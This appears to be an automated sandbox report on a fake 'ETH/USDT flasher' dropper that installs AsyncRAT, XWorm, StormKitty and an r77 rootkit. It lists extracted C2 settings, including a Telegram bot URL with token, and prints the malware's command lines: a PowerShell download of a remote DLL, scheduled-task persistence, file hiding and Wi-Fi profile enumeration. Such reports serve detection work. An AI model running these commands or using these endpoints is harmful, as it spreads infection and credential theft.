Analysis
-
max time kernel
299s -
max time network
298s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
09-12-2024 23:00
Behavioral task
behavioral1
Sample
flash ETH v.1.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral2
Sample
S444.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
SYS.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral4
Sample
USDT Flasher.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
ss32.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral6
Sample
winlogoc.exe
Resource
win10v2004-20241007-en
General
-
Target
flash ETH v.1.exe
-
Size
701KB
-
MD5
d57ac3c31d7069ee6a76c3572f5c234a
-
SHA1
e6f3b23343a9b716c7529d282a2322c1f528b576
-
SHA256
e73c96538ec60c2117b6ed82b7f95f8894abed022ee9ab03c1be90ebd9722f06
-
SHA512
cb4334c76c427305b9b83f2d110e75827c4a83d296679aa04876ccbfd35c7787014a914b722348c076f5d2a3f306f98fdced54ad967953af4ad25d3f3c9eb529
-
SSDEEP
12288:YwEWeJxd5eyh4R0a6mQlRkORS2DNIWWo0dK+/rYtlsfhZDFyJ/b9A64YVNSANzNc:YBfneyh4R0NPRFXBJWo0dK+/sjkhZZyM
Malware Config
Extracted
https://github.com/NGROKC/CTC/raw/main/CTC64.dll
Extracted
asyncrat
Default
127.0.0.1:6606
127.0.0.1:7707
127.0.0.1:8808
https://api.telegram.org/bot7170788789:AAFDgtgiOhG8owpmypRYbNLRYrxlniuiyIs/sendMessage?chat_id=6101540297
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Extracted
xworm
SLL.casacam.net:4444
-
Install_directory
%LocalAppData%
-
install_file
Interrupi.exe
Signatures
-
Asyncrat family
-
Detect Xworm Payload 4 IoCs
resource yara_rule behavioral1/files/0x000e000000023b8e-8.dat family_xworm behavioral1/memory/2388-59-0x0000000002370000-0x0000000002388000-memory.dmp family_xworm behavioral1/memory/3748-44-0x0000000000750000-0x0000000000768000-memory.dmp family_xworm behavioral1/memory/2388-71-0x000000001AFA0000-0x000000001AFB4000-memory.dmp family_xworm -
R77 family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 2 IoCs
resource yara_rule behavioral1/files/0x000a000000023b98-39.dat family_stormkitty behavioral1/memory/1148-58-0x0000000000180000-0x00000000001BE000-memory.dmp family_stormkitty -
Stormkitty family
-
Xworm family
-
r77 rootkit payload 1 IoCs
Detects the payload of the r77 rootkit.
resource yara_rule behavioral1/files/0x0007000000023c7e-273.dat r77_payload -
Async RAT payload 1 IoCs
resource yara_rule behavioral1/files/0x000a000000023b98-39.dat family_asyncrat -
Blocklisted process makes network request 2 IoCs
flow pid Process 30 3336 powershell.exe 32 3336 powershell.exe -
Downloads MZ/PE file
-
Event Triggered Execution: AppInit DLLs 1 TTPs
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.
-
Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 4388 attrib.exe 1732 attrib.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation flash ETH v.1.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation winlogoc.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation S444.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation $77-System32.exe -
Drops startup file 4 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Interrupi.lnk winlogoc.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Interrupi.lnk winlogoc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-System32.exe $77-System32.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-System32.exe $77-System32.exe -
Executes dropped EXE 11 IoCs
pid Process 3748 winlogoc.exe 2872 S444.exe 2388 ss32.exe 1148 SYS.exe 4968 USDT Flasher.exe 5060 $77-System32.exe 4852 Interrupi.exe 2912 Interrupi.exe 2264 Interrupi.exe 3388 Interrupi.exe 4588 Interrupi.exe -
Loads dropped DLL 7 IoCs
pid Process 4600 Process not Found 4852 Interrupi.exe 2912 Interrupi.exe 2264 Interrupi.exe 3388 Interrupi.exe 4588 Interrupi.exe 3272 Process not Found -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Interrupi = "C:\\Users\\Admin\\AppData\\Local\\Interrupi.exe" winlogoc.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77-System32 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$77-System32.exe" $77-System32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\$77-System32 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$77-System32.exe" $77-System32.exe -
pid Process 3336 powershell.exe -
Drops desktop.ini file(s) 8 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\5974d18bed04d14f6a31442d0838ba46\Admin@OZMCVSQS_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Camera Roll\desktop.ini SYS.exe File created C:\Users\Admin\AppData\Local\5974d18bed04d14f6a31442d0838ba46\Admin@OZMCVSQS_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Saved Pictures\desktop.ini SYS.exe File created C:\Users\Admin\AppData\Local\5974d18bed04d14f6a31442d0838ba46\Admin@OZMCVSQS_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini SYS.exe File created C:\Users\Admin\AppData\Local\5974d18bed04d14f6a31442d0838ba46\Admin@OZMCVSQS_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini SYS.exe File opened for modification C:\Users\Admin\AppData\Local\5974d18bed04d14f6a31442d0838ba46\Admin@OZMCVSQS_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini SYS.exe File created C:\Users\Admin\AppData\Local\5974d18bed04d14f6a31442d0838ba46\Admin@OZMCVSQS_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini SYS.exe File opened for modification C:\Users\Admin\AppData\Local\5974d18bed04d14f6a31442d0838ba46\Admin@OZMCVSQS_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini SYS.exe File created C:\Users\Admin\AppData\Local\5974d18bed04d14f6a31442d0838ba46\Admin@OZMCVSQS_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini SYS.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 31 raw.githubusercontent.com 32 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 35 icanhazip.com -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 18 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SYS.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language USDT Flasher.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language flash ETH v.1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language S444.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language $77-System32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 1136 cmd.exe 316 netsh.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 SYS.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier SYS.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2504 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 3 IoCs
pid Process 2388 ss32.exe 3748 winlogoc.exe 5060 $77-System32.exe -
Suspicious behavior: EnumeratesProcesses 38 IoCs
pid Process 1148 SYS.exe 1148 SYS.exe 1148 SYS.exe 1148 SYS.exe 1148 SYS.exe 1148 SYS.exe 1148 SYS.exe 1148 SYS.exe 1148 SYS.exe 1148 SYS.exe 1148 SYS.exe 1148 SYS.exe 1148 SYS.exe 1148 SYS.exe 1148 SYS.exe 1148 SYS.exe 1148 SYS.exe 1148 SYS.exe 1148 SYS.exe 1148 SYS.exe 1148 SYS.exe 1148 SYS.exe 1148 SYS.exe 1148 SYS.exe 1148 SYS.exe 3336 powershell.exe 3336 powershell.exe 3336 powershell.exe 4852 Interrupi.exe 4852 Interrupi.exe 2912 Interrupi.exe 2912 Interrupi.exe 2264 Interrupi.exe 2264 Interrupi.exe 3388 Interrupi.exe 3388 Interrupi.exe 4588 Interrupi.exe 4588 Interrupi.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3748 winlogoc.exe Token: SeDebugPrivilege 2388 ss32.exe Token: SeDebugPrivilege 1148 SYS.exe Token: SeDebugPrivilege 3748 winlogoc.exe Token: SeDebugPrivilege 3336 powershell.exe Token: SeDebugPrivilege 4852 Interrupi.exe Token: SeDebugPrivilege 5060 $77-System32.exe Token: 33 5060 $77-System32.exe Token: SeIncBasePriorityPrivilege 5060 $77-System32.exe Token: 33 5060 $77-System32.exe Token: SeIncBasePriorityPrivilege 5060 $77-System32.exe Token: 33 5060 $77-System32.exe Token: SeIncBasePriorityPrivilege 5060 $77-System32.exe Token: 33 5060 $77-System32.exe Token: SeIncBasePriorityPrivilege 5060 $77-System32.exe Token: 33 5060 $77-System32.exe Token: SeIncBasePriorityPrivilege 5060 $77-System32.exe Token: 33 5060 $77-System32.exe Token: SeIncBasePriorityPrivilege 5060 $77-System32.exe Token: 33 5060 $77-System32.exe Token: SeIncBasePriorityPrivilege 5060 $77-System32.exe Token: SeDebugPrivilege 2912 Interrupi.exe Token: 33 5060 $77-System32.exe Token: SeIncBasePriorityPrivilege 5060 $77-System32.exe Token: 33 5060 $77-System32.exe Token: SeIncBasePriorityPrivilege 5060 $77-System32.exe Token: 33 5060 $77-System32.exe Token: SeIncBasePriorityPrivilege 5060 $77-System32.exe Token: 33 5060 $77-System32.exe Token: SeIncBasePriorityPrivilege 5060 $77-System32.exe Token: 33 5060 $77-System32.exe Token: SeIncBasePriorityPrivilege 5060 $77-System32.exe Token: 33 5060 $77-System32.exe Token: SeIncBasePriorityPrivilege 5060 $77-System32.exe Token: 33 5060 $77-System32.exe Token: SeIncBasePriorityPrivilege 5060 $77-System32.exe Token: 33 5060 $77-System32.exe Token: SeIncBasePriorityPrivilege 5060 $77-System32.exe Token: SeDebugPrivilege 2264 Interrupi.exe Token: 33 5060 $77-System32.exe Token: SeIncBasePriorityPrivilege 5060 $77-System32.exe Token: 33 5060 $77-System32.exe Token: SeIncBasePriorityPrivilege 5060 $77-System32.exe Token: 33 5060 $77-System32.exe Token: SeIncBasePriorityPrivilege 5060 $77-System32.exe Token: 33 5060 $77-System32.exe Token: SeIncBasePriorityPrivilege 5060 $77-System32.exe Token: 33 5060 $77-System32.exe Token: SeIncBasePriorityPrivilege 5060 $77-System32.exe Token: 33 5060 $77-System32.exe Token: SeIncBasePriorityPrivilege 5060 $77-System32.exe Token: 33 5060 $77-System32.exe Token: SeIncBasePriorityPrivilege 5060 $77-System32.exe Token: SeDebugPrivilege 3388 Interrupi.exe Token: 33 5060 $77-System32.exe Token: SeIncBasePriorityPrivilege 5060 $77-System32.exe Token: 33 5060 $77-System32.exe Token: SeIncBasePriorityPrivilege 5060 $77-System32.exe Token: 33 5060 $77-System32.exe Token: SeIncBasePriorityPrivilege 5060 $77-System32.exe Token: 33 5060 $77-System32.exe Token: SeIncBasePriorityPrivilege 5060 $77-System32.exe Token: 33 5060 $77-System32.exe Token: SeIncBasePriorityPrivilege 5060 $77-System32.exe -
Suspicious use of WriteProcessMemory 57 IoCs
description pid Process procid_target PID 4264 wrote to memory of 3748 4264 flash ETH v.1.exe 82 PID 4264 wrote to memory of 3748 4264 flash ETH v.1.exe 82 PID 4264 wrote to memory of 2872 4264 flash ETH v.1.exe 83 PID 4264 wrote to memory of 2872 4264 flash ETH v.1.exe 83 PID 4264 wrote to memory of 2872 4264 flash ETH v.1.exe 83 PID 4264 wrote to memory of 2388 4264 flash ETH v.1.exe 84 PID 4264 wrote to memory of 2388 4264 flash ETH v.1.exe 84 PID 4264 wrote to memory of 1148 4264 flash ETH v.1.exe 85 PID 4264 wrote to memory of 1148 4264 flash ETH v.1.exe 85 PID 4264 wrote to memory of 1148 4264 flash ETH v.1.exe 85 PID 4264 wrote to memory of 4968 4264 flash ETH v.1.exe 86 PID 4264 wrote to memory of 4968 4264 flash ETH v.1.exe 86 PID 4264 wrote to memory of 4968 4264 flash ETH v.1.exe 86 PID 3748 wrote to memory of 2504 3748 winlogoc.exe 89 PID 3748 wrote to memory of 2504 3748 winlogoc.exe 89 PID 2872 wrote to memory of 4792 2872 S444.exe 91 PID 2872 wrote to memory of 4792 2872 S444.exe 91 PID 2872 wrote to memory of 4792 2872 S444.exe 91 PID 4792 wrote to memory of 1732 4792 cmd.exe 93 PID 4792 wrote to memory of 1732 4792 cmd.exe 93 PID 4792 wrote to memory of 1732 4792 cmd.exe 93 PID 2872 wrote to memory of 5060 2872 S444.exe 96 PID 2872 wrote to memory of 5060 2872 S444.exe 96 PID 2872 wrote to memory of 5060 2872 S444.exe 96 PID 5060 wrote to memory of 3840 5060 $77-System32.exe 99 PID 5060 wrote to memory of 3840 5060 $77-System32.exe 99 PID 5060 wrote to memory of 3840 5060 $77-System32.exe 99 PID 3840 wrote to memory of 4388 3840 cmd.exe 101 PID 3840 wrote to memory of 4388 3840 cmd.exe 101 PID 3840 wrote to memory of 4388 3840 cmd.exe 101 PID 1148 wrote to memory of 1136 1148 SYS.exe 102 PID 1148 wrote to memory of 1136 1148 SYS.exe 102 PID 1148 wrote to memory of 1136 1148 SYS.exe 102 PID 1136 wrote to memory of 2244 1136 cmd.exe 104 PID 1136 wrote to memory of 2244 1136 cmd.exe 104 PID 1136 wrote to memory of 2244 1136 cmd.exe 104 PID 1136 wrote to memory of 316 1136 cmd.exe 105 PID 1136 wrote to memory of 316 1136 cmd.exe 105 PID 1136 wrote to memory of 316 1136 cmd.exe 105 PID 1136 wrote to memory of 2344 1136 cmd.exe 106 PID 1136 wrote to memory of 2344 1136 cmd.exe 106 PID 1136 wrote to memory of 2344 1136 cmd.exe 106 PID 1148 wrote to memory of 404 1148 SYS.exe 107 PID 1148 wrote to memory of 404 1148 SYS.exe 107 PID 1148 wrote to memory of 404 1148 SYS.exe 107 PID 404 wrote to memory of 2056 404 cmd.exe 109 PID 404 wrote to memory of 2056 404 cmd.exe 109 PID 404 wrote to memory of 2056 404 cmd.exe 109 PID 404 wrote to memory of 1492 404 cmd.exe 110 PID 404 wrote to memory of 1492 404 cmd.exe 110 PID 404 wrote to memory of 1492 404 cmd.exe 110 PID 5060 wrote to memory of 4964 5060 $77-System32.exe 111 PID 5060 wrote to memory of 4964 5060 $77-System32.exe 111 PID 5060 wrote to memory of 4964 5060 $77-System32.exe 111 PID 4964 wrote to memory of 3336 4964 cmd.exe 114 PID 4964 wrote to memory of 3336 4964 cmd.exe 114 PID 4964 wrote to memory of 3336 4964 cmd.exe 114 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 1732 attrib.exe 4388 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\flash ETH v.1.exe"C:\Users\Admin\AppData\Local\Temp\flash ETH v.1.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4264 -
C:\Users\Admin\AppData\Roaming\winlogoc.exe"C:\Users\Admin\AppData\Roaming\winlogoc.exe"2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3748 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Interrupi" /tr "C:\Users\Admin\AppData\Local\Interrupi.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2504
-
-
-
C:\Users\Admin\AppData\Roaming\S444.exe"C:\Users\Admin\AppData\Roaming\S444.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2872 -
C:\Windows\SysWOW64\cmd.execmd.exe /c attrib +s +h +r "C:\Users\Admin\AppData\Roaming\S444.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4792 -
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r "C:\Users\Admin\AppData\Roaming\S444.exe"4⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:1732
-
-
-
C:\System32\$77-System32.exe"C:\System32\$77-System32.exe"3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5060 -
C:\Windows\SysWOW64\cmd.execmd.exe /c attrib +s +h +r "C:\System32\$77-System32.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3840 -
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r "C:\System32\$77-System32.exe"5⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:4388
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Rot.bat" "4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4964 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell (new-object System.Net.WebClient).DownloadFile('https://github.com/NGROKC/CTC/raw/main/CTC64.dll','\System32\r77-x64.dll');exit5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3336
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\ss32.exe"C:\Users\Admin\AppData\Roaming\ss32.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
PID:2388
-
-
C:\Users\Admin\AppData\Roaming\SYS.exe"C:\Users\Admin\AppData\Roaming\SYS.exe"2⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1148 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All3⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:1136 -
C:\Windows\SysWOW64\chcp.comchcp 650014⤵
- System Location Discovery: System Language Discovery
PID:2244
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
PID:316
-
-
C:\Windows\SysWOW64\findstr.exefindstr All4⤵
- System Location Discovery: System Language Discovery
PID:2344
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:404 -
C:\Windows\SysWOW64\chcp.comchcp 650014⤵
- System Location Discovery: System Language Discovery
PID:2056
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1492
-
-
-
-
C:\Users\Admin\AppData\Roaming\USDT Flasher.exe"C:\Users\Admin\AppData\Roaming\USDT Flasher.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4968
-
-
C:\Users\Admin\AppData\Local\Interrupi.exeC:\Users\Admin\AppData\Local\Interrupi.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4852
-
C:\Users\Admin\AppData\Local\Interrupi.exeC:\Users\Admin\AppData\Local\Interrupi.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2912
-
C:\Users\Admin\AppData\Local\Interrupi.exeC:\Users\Admin\AppData\Local\Interrupi.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2264
-
C:\Users\Admin\AppData\Local\Interrupi.exeC:\Users\Admin\AppData\Local\Interrupi.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3388
-
C:\Users\Admin\AppData\Local\Interrupi.exeC:\Users\Admin\AppData\Local\Interrupi.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4588
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
2AppInit DLLs
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
2AppInit DLLs
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Hide Artifacts
2Hidden Files and Directories
2Modify Registry
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
147KB
MD51b8bd653321cf3cbc786e563555fbc75
SHA15638efe0476c8c1b74c6604db419be814d1d90a0
SHA256919a332e85d7c32a6f0a1bdd15b211b8b273b73fe05a553ea0f230a0958586c7
SHA512bafdbc8413828c5427983fa0e9403a2d9a88d0ad2f27f92842310852d273f2d2c9a0c6f9f64e1aac03fadf49f9a3bcf58c6b7c8b06debcce46536114cde0175b
-
Filesize
1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
C:\Users\Admin\AppData\Local\5974d18bed04d14f6a31442d0838ba46\Admin@OZMCVSQS_en-US\Browsers\Firefox\Bookmarks.txt
Filesize105B
MD52e9d094dda5cdc3ce6519f75943a4ff4
SHA15d989b4ac8b699781681fe75ed9ef98191a5096c
SHA256c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142
SHA512d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7
-
C:\Users\Admin\AppData\Local\5974d18bed04d14f6a31442d0838ba46\Admin@OZMCVSQS_en-US\System\Process.txt
Filesize4KB
MD558bb3d6750ba41210b12c2ce75847bb1
SHA19d7f44ba64c6bedb3a946e4b4afc9ce726d86e4e
SHA25636e607f4e3abbc67a9cb4ac8dbba302b574723fa745d2f3bc6ffca40b2e14d23
SHA512b89e73e172873c144169cc420d167efad4bef663c610d0511914a7c2f8d81e26bde57323f3339bf7186e35b54f6f0e22dccf7632fe020759283ed13377f3a781
-
Filesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
Filesize
229B
MD55623353a38611880912397750358a0cf
SHA11abfda3058cae5b11da3e6551fbec2eb354a25d3
SHA2564b97706d98357279a5f3f1c720f384a47d020a1fbb6aac5460e1d87786aba86c
SHA51278b78820ce33341f40f71924087d255b6ec74472bb22562a2bfadf5f090662c691d5a293f5f8148477f414cf7f38c53c490b595489d79966d944dfe73097f0fb
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
124KB
MD59618e15b04a4ddb39ed6c496575f6f95
SHA11c28f8750e5555776b3c80b187c5d15a443a7412
SHA256a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab
SHA512f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26
-
Filesize
20KB
MD549693267e0adbcd119f9f5e02adf3a80
SHA13ba3d7f89b8ad195ca82c92737e960e1f2b349df
SHA256d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f
SHA512b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2
-
Filesize
